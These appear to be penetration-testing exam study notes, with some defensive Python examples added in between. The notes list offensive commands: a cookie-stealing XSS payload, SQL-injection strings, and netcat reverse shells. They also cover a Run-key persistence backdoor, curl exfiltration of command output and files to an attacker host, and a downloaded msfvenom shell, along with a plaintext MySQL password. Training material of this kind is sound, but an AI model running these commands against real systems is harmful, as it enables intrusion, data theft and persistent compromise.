eJPT/eCPPT Notes
Useful Notes for the eJPT and eCPPT exams.
Methodology
Testing Checklist
Refer to the OWASP Testing Checklist
Routing
Check Routes
Command:
route
Add Route
Command:
ip route add <network_ip>/<cidr> via <gateway_ip> dev <network_card_name>
Start Python Server
Recommended to change into the /tmp directory first
Command:
python -m SimpleHTTPServer 8080
Put things in the same directory to access them via a webpage
Web
Netcat
Start a connection:
nc -v hack.me 80
Make GET request:
GET / HTTP/1.1
Host: hack.me
Only works for HTTP
For HTTPS use OpenSSL
Command:
openssl s_client -connect hack.me:443
Use -debug or -state for more info
Use -quiet to remove connection info
Information Gathering
Open Source
Crunchbase: IT startup database, information about founders, investors, employees, buyouts, acquisitions
Whois Database: Owner name, address, email, technical contacts
Subdomain Enumeration
Passive Enumeration
Google query:
"site:company.com"
Tools:
virustotal.com: Search cached DNS subdomains
crt.sh: Collect SSL certificates and valid domain names
Inspecting certificates on domains may lead to more subdomains
Tools for Subdomain Enumeration
sublist3r:
Command:
sublist3r -d google.com
Has brute force option that parses provided wordlist
amass:
Install:
apt install snapd
service snapd start
snap install amass
snap run amass
Example:
snap run amass -ip -d google.com
Footprinting & Scanning
Mapping a Network
fping performs a ping sweep on an IP range:
Commands:
fping -a -g 10.54.12.0/24
fping -a -g 10.54.12.0 10.54.12.255
fping -a -g 10.54.12.0/24 2>/dev/null
nmap can perform ping scans with the -sn flag:
Commands:
nmap -sn 200.200.0.0/16
nmap -sn 200.200.123.1-12
nmap -sn 172.16.12.*
nmap -sn 200.200.12-13.*
nmap -iL <file_with_hosts>
OS Fingerprinting
nmap can fingerprint the OS with the -O flag; use the -Pn flag to skip the ping:
Command:
nmap -O -Pn <targets>
Port Scanning
TCP Connect Scan:
Scanning Open Port:
SYN ->
<- SYN + ACK
ACK ->
RST + ACK -> (closes connection)
Scanning Closed Port:
SYN ->
<- RST + ACK (port is closed)
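The two handshake sequences above are what a connect scan leaves in connection logs, so they can be used to spot one. This is an added example, not from the notes: it classifies constructed "src dst dport flags" records (S = SYN, SA = SYN+ACK, A = ACK, RA = RST+ACK) and flags a source that probes many ports.

```python
# Added example (not from the notes): classify connect-scan probes from the
# handshake sequences above and flag a source that probes many distinct ports.
# Records are constructed, one per connection: "src dst dport flags...",
# with the flags in arrival order (S = SYN, SA = SYN+ACK, A = ACK, RA = RST+ACK).
from collections import defaultdict
from typing import Dict, List, Tuple

SAMPLE_FLOWS = """\
10.0.0.7 10.0.0.20 22 S SA A RA
10.0.0.7 10.0.0.20 23 S RA
10.0.0.7 10.0.0.20 80 S SA A RA
10.0.0.7 10.0.0.20 443 S RA
10.0.0.7 10.0.0.20 3306 S RA
10.0.0.9 10.0.0.20 80 S SA A
""".strip().splitlines()

PROBE_THRESHOLD = 4  # distinct ports from one source before we alert


def classify(flags: List[str]) -> str:
    """Map a flag sequence to the outcome described in the notes."""
    if flags[:2] == ["S", "RA"]:
        return "closed"
    if flags[:3] == ["S", "SA", "A"]:
        # Completed handshake: a connect scan tears it down with RST+ACK at
        # once, while a real client goes on to send application data.
        return "open-scan" if flags[3:4] == ["RA"] else "open-session"
    return "other"


def parse_flow(line: str) -> Tuple[str, str, int, str]:
    """Split one record into (src, dst, dport, outcome)."""
    src, dst, dport, *flags = line.split()
    return src, dst, int(dport), classify(flags)


def scanning_sources(lines: List[str]) -> Dict[str, List[int]]:
    """Sources whose probes touched at least PROBE_THRESHOLD distinct ports,
    counting only the outcomes a scanner produces (closed, or open then reset)."""
    ports: Dict[str, set] = defaultdict(set)
    for line in lines:
        src, _dst, dport, outcome = parse_flow(line)
        if outcome in ("closed", "open-scan"):
            ports[src].add(dport)
    return {s: sorted(p) for s, p in ports.items() if len(p) >= PROBE_THRESHOLD}


if __name__ == "__main__":
    print(scanning_sources(SAMPLE_FLOWS))
```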
nmap Port Scanning
Common Flags:
-sT: TCP connect scan
-sS: SYN scan
-sV: Version detection
-Pn: Skips ping sweep, useful if network has firewalls or blocks ICMP packets
Spotting Firewall
Incomplete nmap results on well-known services like a web server:
Example: "http?" or "tcpwrapped" means the remote host closed the connection without receiving data
Use nmap --reason to get more information on why a port is open or closed
masscan
Used for scanning large networks quickly, not as accurate as nmap:
Example:
./masscan -p 80,443,22 -Pn --rate=800 --banners 10.142.111.0/24 -e tap0 --router-ip 10.142.111.1 --echo > masscan.txt
Vulnerability Assessment
Nessus
Popular vulnerability scanner, uses a client & server:
Starts with a ping sweep and port scan, then probes each daemon and cross-checks responses with a vulnerability database
Prone to false positives
Installing Nessus
Command:
dpkg -i nessus.deb
Usage
Commands:
service nessusd start
Open web interface (may need to add security exception)
Setup custom policy and scan using GUI, export results
Web Attacks
Web Server Fingerprinting
Netcat:
Command:
nc <target_ip> 80
After connecting, send a valid HTTP request:
HEAD / HTTP/1.1
Netcat only works on HTTP websites, for HTTPS use OpenSSL:
Command:
openssl s_client -connect target.site:443
Example:
HEAD / HTTP/1.0
Automated Fingerprinting Tool httprint
Example:
httprint -P0 -h <target_ip> -s /usr/share/httprint/signatures.txt
Flags:
-P0: Do not ping the web server
-h: Define host
-s: Define signature file
HTTP Verbs
GET: Used to request resource
GET /page.php HTTP/1.1
HOST: www.example.com
POST: Used to submit HTML form data
POST /login.php HTTP/1.1
HOST: www.example.com

username=John&password=yourmom
HEAD: Used to grab header
HEAD / HTTP/1.1
HOST: www.example.com
PUT: Used to upload file to server
PUT /path/to/destination HTTP/1.1
HOST: www.example.com

<Put data>
You must know the size of the file you are trying to upload
Example:
wc -m payload.php
20 payload.php
PUT /payload.php HTTP/1.1
Content-type: text/html
Content-length: 20

<?php phpinfo(); ?>
DELETE: Used to remove file from server
DELETE /path/to/destination HTTP/1.1
HOST: www.example.com
OPTIONS: Used to query web server for available HTTP verbs
OPTIONS / HTTP/1.1
HOST: www.example.com
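The HEAD and OPTIONS responses above are worth reading programmatically when reviewing your own servers: the Server header is the fingerprint, and the Allow header shows whether PUT or DELETE are reachable. Added example, not from the notes; the response text and the Apache banner in it are constructed.

```python
# Added example (not from the notes): parse a raw HTTP response such as the one
# returned to the HEAD / OPTIONS requests above, then report the server banner
# and any verb in Allow that lets a client modify content. The response below
# is constructed, banner included.
from typing import Dict, List, Tuple

SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "Allow: GET,HEAD,POST,OPTIONS,PUT,DELETE\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Verbs a plain web site normally needs; anything else in Allow is worth a look.
EXPECTED_VERBS = {"GET", "HEAD", "POST", "OPTIONS"}


def parse_response(raw: str) -> Tuple[int, Dict[str, str]]:
    """Return (status_code, headers) from a raw HTTP/1.x response head.
    Header names are lower-cased because the protocol treats them
    case-insensitively."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split(" ")[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # tolerate stray lines rather than abort the parse
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return status, headers


def risky_verbs(headers: Dict[str, str]) -> List[str]:
    """Verbs advertised in Allow beyond the expected read/form set."""
    allow = headers.get("allow", "")
    verbs = {v.strip().upper() for v in allow.split(",") if v.strip()}
    return sorted(verbs - EXPECTED_VERBS)


def fingerprint(headers: Dict[str, str]) -> str:
    """Server banner as disclosed by the Server header, or 'unknown'."""
    return headers.get("server", "unknown")


if __name__ == "__main__":
    status, hdrs = parse_response(SAMPLE_OPTIONS_RESPONSE)
    print(status, fingerprint(hdrs), risky_verbs(hdrs))
```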
Netcat
Setup nc Listener or Server
Command:
nc -lvp 8888
Connect to nc listener:
nc -v 127.0.0.1 8888
To make the connection UDP, add -u
Sending file over nc:
Command:
cat tobesent.txt | nc -v 127.0.0.1 8888
Reverse Shell:
Command:
nc -lvp 1337 -e /bin/bash
Dirbuster / Dirb
Dirbuster
GUI based directory enumerator
Dirb
Command line based directory enumerator
Basic Usage
Commands:
apt install dirb
dirb http://google.com
dirb http://google.com /usr/share/dirb/wordlists/small.txt
Common Flags
-a: Change user agent to make requests look like they come from a browser (see useragentstring.com)
-c "COOKIE: XYZ": Specifies cookie in request
-u "admin:password": User authentication in request
-H "My Header: My content": Add header into request
-r: Turn off recursive search (sub directories)
-z 1000: Changes speed to one request a second
-s: Silent mode, only displays items that were found
-X ".php,.bak": Append extensions to word list
-x extensions.txt: Include file with extensions
-o results.txt: Save results in output file
Run dirb through Proxy (Burp)
Command:
dirb http://google.com -p http://127.0.0.1:8080
MySQL
Login to MySQL Server
Command:
mysql -u awdmgmt -pUChxKQk96dVtM07 -h 10.104.11.198
-u for user, -p for password (no space between -p and the password)
Google Dorking
site: Only include results from specified host
intitle: Filters results based on title of page
inurl: Text included in URL
filetype: Used to search for specific file extensions .pdf, .xls
AND, OR, &, |: Logical operators for queries
-: Used to filter out words
Cross-Site Scripting (XSS)
Overview
Occurs when a web application uses unfiltered user input to build the output content displayed to its end users; this lets an attacker control the HTML and JavaScript code, thus attacking the application user.
User Input
Any parameter coming from client side of web app such as:
Request headers
Cookies
Form inputs
POST parameters
GET parameters
Payloads
Alert that XSS is there:
<script>alert("oh boy xss");</script>
Steal cookies:
<script>alert(document.cookie);</script>
Steal cookies and send them to attacker controlled site:
<script> var i = new Image(); i.src="http://192.168.99.11/get.php?cookies="+document.cookie; </script>
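To see why the payloads above work and what stops them, here is the same page fragment built with unfiltered input and with HTML output encoding, plus the cookie attributes that keep document.cookie from exposing a session id. Added example, not from the notes; the fragment, function names and cookie name are constructed.

```python
# Added example (not from the notes): the same HTML fragment built with
# unfiltered input (the XSS condition above) and with HTML output encoding,
# exercised with the notes' own alert payload, plus the cookie attributes that
# blunt the document.cookie payloads. Fragment and names are constructed.
import html
from typing import List

ALERT_PAYLOAD = '<script>alert("oh boy xss");</script>'


def render_unsafe(name: str) -> str:
    """Vulnerable: user input is concatenated straight into the markup, in a
    text node and again inside a double-quoted attribute."""
    return '<p>Hello, ' + name + '</p><input value="' + name + '">'


def render_safe(name: str) -> str:
    """Hardened: encode for the HTML context before building the output.
    html.escape(quote=True) converts & < > " ' into entities, which is the
    right encoding for both the text node and the quoted attribute here."""
    safe = html.escape(name, quote=True)
    return '<p>Hello, ' + safe + '</p><input value="' + safe + '">'


def payload_survives(fragment: str, payload: str) -> bool:
    """True if the raw payload reached the markup unchanged, meaning the
    browser would parse it as a tag rather than display it as text."""
    return payload in fragment


def session_cookie(value: str) -> str:
    """Set-Cookie line for a session id. HttpOnly stops document.cookie from
    reading it, Secure restricts it to TLS, SameSite limits cross-site sends.
    This limits what the cookie-stealing payloads can reach; it does not fix
    the injection itself, only output encoding does that."""
    return f"Set-Cookie: SESSIONID={value}; HttpOnly; Secure; SameSite=Lax; Path=/"


def cookie_flags(header: str) -> List[str]:
    """Attribute names present in a Set-Cookie header, for a quick audit."""
    parts = [p.strip() for p in header.split(":", 1)[1].split(";")]
    return [p.split("=", 1)[0] for p in parts[1:]]


if __name__ == "__main__":
    print(render_unsafe(ALERT_PAYLOAD))
    print(render_safe(ALERT_PAYLOAD))
    print(cookie_flags(session_cookie("constructed-session-id")))
```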
SQL
Example Query
Command:
SELECT name, description FROM products WHERE id=9;
Web App Use
In order for a web app to use database it must:
Connect to database
Submit query
Retrieve results before applications can use results
Example SQL Injection
Command:
' OR 'a'='a
' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a
Finding Injection Points
Test every supplied user input used by the web app:
GET parameters
POST parameters
HTTP headers:
User-Agent
Cookie
Accept
Input SQL Injection
String terminators: ' , "
Keywords: SELECT, UNION
SQL Comments: # , --
SQL Functions
Commands:
show databases; // shows databases
use selected_db; // replace selected_db with db
show tables; // shows tables in selected db
select * from flag; // shows all records in flag
update users set adm="yes" where username="tracking1"; // update records in db
More Commands
SELECT user(); // displays current database user
select substring(user(), 1, 1) = 'r'; // returns true or false (0 or 1), effective for learning more about what the db contains
Union Based Injection
Commands:
UNION SELECT user(); -- -
UNION SELECT null, null; -- - // two fields in this example
UNION SELECT 'els1', 'els2', 'els3'; -- -
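The injection payloads in the sections above only work because the input becomes part of the SQL text. Added example, not from the notes: the products query built by concatenation next to the parameterised version, run against a constructed in-memory SQLite database with the notes' OR and UNION payloads (table contents are made up).

```python
# Added example (not from the notes): the notes' products query built by string
# concatenation versus with a bound parameter, run against a constructed
# in-memory SQLite database with the two injection payloads from the notes.
import sqlite3
from typing import List, Tuple

OR_PAYLOAD = "' OR 'a'='a"
UNION_PAYLOAD = "' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a"


def make_db() -> sqlite3.Connection:
    """Constructed schema mirroring the notes' products and Accounts tables."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, description TEXT);
        INSERT INTO products VALUES (9, 'widget', 'a widget');
        INSERT INTO products VALUES (10, 'gadget', 'a gadget');
        CREATE TABLE Accounts (Username TEXT, Password TEXT);
        INSERT INTO Accounts VALUES ('admin', 'hunter2');
    """)
    return con


def lookup_unsafe(con: sqlite3.Connection, name: str) -> List[Tuple]:
    """Vulnerable: the user value is spliced into the SQL text, so a quote in
    it ends the string literal and the rest is parsed as SQL."""
    sql = "SELECT name, description FROM products WHERE name='" + name + "'"
    return con.execute(sql).fetchall()


def lookup_safe(con: sqlite3.Connection, name: str) -> List[Tuple]:
    """Hardened: the value is bound to a ? placeholder by the driver and is
    only ever compared as data, never parsed as SQL."""
    sql = "SELECT name, description FROM products WHERE name=?"
    return con.execute(sql, (name,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("unsafe, OR payload   :", lookup_unsafe(db, OR_PAYLOAD))
    print("unsafe, UNION payload:", lookup_unsafe(db, UNION_PAYLOAD))
    print("safe,   UNION payload:", lookup_safe(db, UNION_PAYLOAD))
```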
SQLMap
Overview
Open source penetration testing tool that automates process of detecting SQL injection
Capable of both detecting and exploiting
Always recommended to test by hand first to avoid crashing DB
Basic Syntax
Command:
sqlmap -u <URL> -p <injection_parameters> [options]
Examples
Command:
sqlmap -u 'http://victim.site/view.php?id=1' -p id --technique=U
Test the id parameter of the GET request for view.php, tells sqlmap to use UNION based injection
To test POST request:
sqlmap -u <URL> --data=<POST_String> -p parameter [options]
Command:
sqlmap -u http://sql.site/view.php?id=1
sqlmap -u http://sql.site/view.php?id=1 -b
sqlmap -u http://sql.site/view.php?id=1 --tables
sqlmap -u http://sql.site/view.php?id=1 -D selfie4u --columns
sqlmap -u http://sql.site/view.php?id=1 -D selfie4u --dump
More SQLMap Syntax
-v3: Displays queries used
--users: Enumerate users
--dbs: Enumerate the databases present
-D dbname --tables: Specify db and enumerate tables
-T specified_table --columns: Grab columns from specified table
-C column1,column2 --dump: Dump records of specified columns
--data='user=a&pass=a': POST injection, grab post info from Burp Suite
Metasploit SQL Enumeration
Use auxiliary/scanner/mssql/mssql_login
Backdoors
Hide ncat in the Windows System32 directory
Forward Shell
On Windows machine:
ncat -l -p 5555 -e cmd.exe
On attacker machine:
ncat 192.168.0.25 5555
Reverse Shell
On attacker machine:
ncat -l -p 5555 -v
On Windows machine:
ncat -e cmd.exe 192.168.0.24 5555
Persistent Backdoor
Start listener on attacker machine
Open regedit on Windows machine
Navigate to
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Right-click and add new string value, name ncat, edit string value and add path to ncat binary along with reverse shell syntax:
"C:\Windows\System32\ncat.exe <attacker_ip> <port> -e cmd.exe"
Restart victim machine to activate shell
Password Attacks
JohnTheRipper
After acquiring /etc/passwd (users on Linux system) and /etc/shadow (hashed passwords on Linux system), John needs user and pass to be in the same file:
Command:
unshadow passwd shadow > crackme
Brute Force:
john --incremental --user:<users_to_crack> <file_to_crack>
To display passwords recovered by John:
john --show crackme
Cracked passwords stored in file
Dictionary Attack
Command:
john --wordlist=custom_wordlist --rules <file_to_crack>
Good wordlist to install:
apt-get install seclists
Rainbow Tables
Tables containing passwords that have been pre-hashed saving time and computational power.
Ophcrack: Rainbow table password cracking tool
Authentication Cracking
Hydra
Tool used for cracking network services such as HTTP, SSH, FTP, etc.
Syntax:
hydra -L users.txt -P pass.txt <service://server> <options>
Configuring Hydra
Inspect page source
Figure out how credentials are being sent to server (POST)
Figure out names of parameters being sent (pwd, usr)
Example Webpage:
hydra crackme.site http-post-form "/login.php:usr=^USR^&pwd=^PASS^:invalid credentials" -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou.txt -f -V
-L: List of user names
-P: List of passwords
-f: Hydra will stop after first credential found
-V: Verbosity
Example SSH:
hydra 192.168.102.143 ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -V
Windows Shares
UNC or Universal Naming Convention Paths
\\servername\ShareName\file.net
Administrative Shares
\\ComputerName\C$: Lets admin access volume on local machine
\\ComputerName\admin$: Points to the Windows installation directory
\\ComputerName\ipc$: Used for interprocess communication
Null Sessions
An anonymous connection to an inter-process communication network service on Windows-based computers:
Check and see if the target has any file server enabled:
nbtstat -A 10.123.162.2
or nbtstat /? for help
The third line down will tell you if the target is sharing any files in the <> field
If file server is enabled, enumerate shares with
NET VIEW
NET VIEW <target_ip>
Try to connect to share
NET USE \\<target_ip>\IPC$ '' /u:''
(connect to the IPC$ share without authentication)
enum:
Script that automates enumeration of shares
Commands:
enum -S <target_ip> // enumerates shares
enum -U <target_ip> // enumerates users
enum -P <target_ip> // enumerates password policies
winfo:
Another enumeration tool
Command:
winfo <target_ip> -n // -n for null session
Linux Version
nmblookup -A <target_ip>
smbclient -L \\:<target_ip> -N
Use instead:
smbclient -L <WORKGROUP> -I <TARGET_IP> -N -U ""
(allows you to see services on target; -N forces no password)
smbclient //<target_ip>/IPC$ -N
Use instead:
smbclient \\\\<target_ip>\\<target_share> -N
(connects to IPC share without authentication)
Enumeration Scripts
enum4linux script:
Enumerates shares
Brute force enumeration:
enum4linux -s /usr/share/enum4linux/share-list.txt <target_ip>
samrdump.py:
Enumerates info about users using null sessions
Command:
cd /usr/share/doc/python-impacket-doc/examples
python samrdump.py <target_ip>
nmap smb enumeration:
Commands:
nmap --script=smb-enum-shares <target_ip> // enumerates shares
nmap --script=smb-enum-users <target_ip> // enumerates users
nmap --script=smb-brute <target_ip> // brute force authentication
ARP Poisoning
Works by changing the ARP caches on two network nodes. Attacker sends unsolicited ARP packets to the two nodes telling them to route traffic through the attacker computer.
Enable Packet Forwarding
Command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Dsniff
Tool used for ARP poisoning:
Example:
arpspoof -i <interface> -t <target> -r <host>
-i: NIC
-t and -r: Victims
You can then run Wireshark to see the traffic
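The cache change described above is also how the attack is detected from the victim side: an IP whose MAC suddenly differs, or one MAC answering for both the gateway and a host. Added example, not from the notes: it parses `ip neigh show` snapshots (constructed, but in the real line format) and raises alerts on both signals.

```python
# Added example (not from the notes): spot the cache change that arpspoof
# causes by tracking IP-to-MAC bindings over time and flagging an IP whose MAC
# changes or a MAC that answers for more than one IP. The `ip neigh` snapshots
# below are constructed; the line format is the real one.
from collections import defaultdict
from typing import Dict, List, Tuple

SNAPSHOT_BEFORE = """\
10.0.0.1 dev eth0 lladdr aa:aa:aa:aa:aa:01 REACHABLE
10.0.0.25 dev eth0 lladdr bb:bb:bb:bb:bb:25 STALE
"""
SNAPSHOT_AFTER = """\
10.0.0.1 dev eth0 lladdr cc:cc:cc:cc:cc:99 REACHABLE
10.0.0.25 dev eth0 lladdr cc:cc:cc:cc:cc:99 REACHABLE
"""


def parse_ip_neigh(text: str) -> List[Tuple[str, str]]:
    """Extract (ip, mac) pairs from `ip neigh show` output; entries without an
    lladdr (FAILED / INCOMPLETE) are skipped."""
    pairs = []
    for line in text.splitlines():
        fields = line.split()
        if "lladdr" in fields:
            pairs.append((fields[0], fields[fields.index("lladdr") + 1].lower()))
    return pairs


def detect_arp_spoof(observations: List[Tuple[str, str]]) -> List[str]:
    """Alerts for bindings that look poisoned. A DHCP lease moving to a new
    NIC also changes a MAC, so the multi-IP signal is the stronger one."""
    first_mac: Dict[str, str] = {}
    ips_by_mac: Dict[str, set] = defaultdict(set)
    alerts: List[str] = []
    for ip, mac in observations:
        if ip in first_mac and first_mac[ip] != mac:
            alerts.append(f"{ip} changed from {first_mac[ip]} to {mac}")
        first_mac.setdefault(ip, mac)
        ips_by_mac[mac].add(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"{mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    seen = parse_ip_neigh(SNAPSHOT_BEFORE) + parse_ip_neigh(SNAPSHOT_AFTER)
    for alert in detect_arp_spoof(seen):
        print("ALERT:", alert)
```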
Metasploit
Framework for Exploiting Machines
Requirements Before Use
Commands:
service postgresql start
service metasploit start
Start
Command:
msfconsole
Help
Command:
show -h
Search
Command:
search <search_term>
Show All Exploits
Command:
show exploits
Use Exploit
Command:
use exploit/windows/ftp/turboftp_port
Go "Back"
Command:
back
Get Info About Exploit
Command:
info
See Exploit Options
Command:
options
Configure Exploit Parameters
Command:
set
See Available Payloads
Command:
show payloads
Set Payload
Command:
set payload windows/meterpreter/reverse_tcp
Launch Exploit/Payload
Command:
exploit
Create Listener
Commands:
use exploit/multi/handler
set payload php/reverse_php
set payload php/meterpreter_reverse_php
set payload php/meterpreter_reverse_tcp
Upgrade to Meterpreter
Commands:
background (the current session)
use post/multi/manage/shell_to_meterpreter
Scan for SMB Vulnerabilities with nmap
Command:
nmap --script smb-check-vulns.nse --script-args=unsafe=1 <target_ip>
Meterpreter
Advanced Shell
Search for Meterpreter Payloads
Command:
search meterpreter
Put Session in Background
Command:
background
List Current Sessions
Command:
sessions -l
Resume Session
Command:
sessions -i 1
Get Info About Machine
Command:
sysinfo
Network Info
Command:
ifconfig
Routing Tables
Command:
route
Get Current User ID
Command:
getuid
Elevate Privilege
Command:
getsystem
If operation fails, try the following:
Background session
Search bypassuac
use exploit/windows/local/bypassuac
Set session
Exploit
Uploading/Downloading Files
Command:
upload <path>
or
download <path>
Use Standard OS Shell
Command:
shell
See All Processes Running
Command:
ps
See Process Meterpreter is Attached to
Command:
getpid
Check UAC
Command:
run post/windows/gather/win_privs
Migrating Process to be Stealthy
When migrating process, the new process must have the same level of privilege:
Command:
ps -U SYSTEM
This command will search for all other processes with system-level privilege:
Command:
migrate <pid>
Remote Code Execution (RCE)
Blind RCE
Test bash sleep command to see if page is delayed:
Command:
sleep 5
Testing Network Connectivity
Use Wireshark to pick up ICMP packets:
Command:
ping <attacker> -c 5
May need to use URL encoding to keep syntax intact
Testing Webshell
Get Paths to Installed Programs
Command:
echo $PATH
Look for Specific Tools
Command:
which <tool>
Curl
See if You Can Establish TCP Connection
On Attacker:
Setup listener with nc:
nc -lvp 53
On Target:
Establish TCP with curl:
curl http://<attacker_ip>:<attacker_port>
Test Commands with Curl
Commands:
curl http://<attacker_ip>:<attacker_port>/$(whoami)
Test Commands with Spaces in the Output with Curl
Commands:
curl http://<attacker_ip>:<attacker_port>/$(id)
Command above will not display properly because there are spaces in the output, need to encode to see full output:
Command:
curl http://<attacker_ip>:<attacker_port>/$(id|base64)
To decode:
Command:
echo "fsdaflasdfsjdf" | base64 -d
Downloading Files with Curl
Command:
curl http://<attacker_ip>:<attacker_port>/file -T /etc/issue
Uploading Files
Start simple Python HTTP server:
Command:
python -m SimpleHTTPServer 9090
All files in directory you start Python server in will be available via server
Generate payload & store it in server directory:
Command:
msfvenom -p linux/x64/shell_reverse_tcp lhost=<attacker_ip> lport=<port_on_listener> -f elf -o reverse53
Get payload on victim machine:
Command:
curl http://<attacker_server>:<server_port>/reverse53 -o /tmp/r
chmod +x /tmp/r
Test if file was uploaded by downloading it:
Command:
curl http://<victim_ip>:<victim_port>/ -T /tmp/r
Running payload:
Command:
Start the nc listener, then execute the payload:
/tmp/r
Spawning a Better Shell:
Command:
bash -i
Spawns bash environment
There are lots of shells you can easily spawn, look them up ("spawning tty shell"):
Command:
python -c 'import pty; pty.spawn("/bin/bash")'
Pivoting with Meterpreter
Command:
background the current session and then:
run autoroute -s 172.16.50.0/24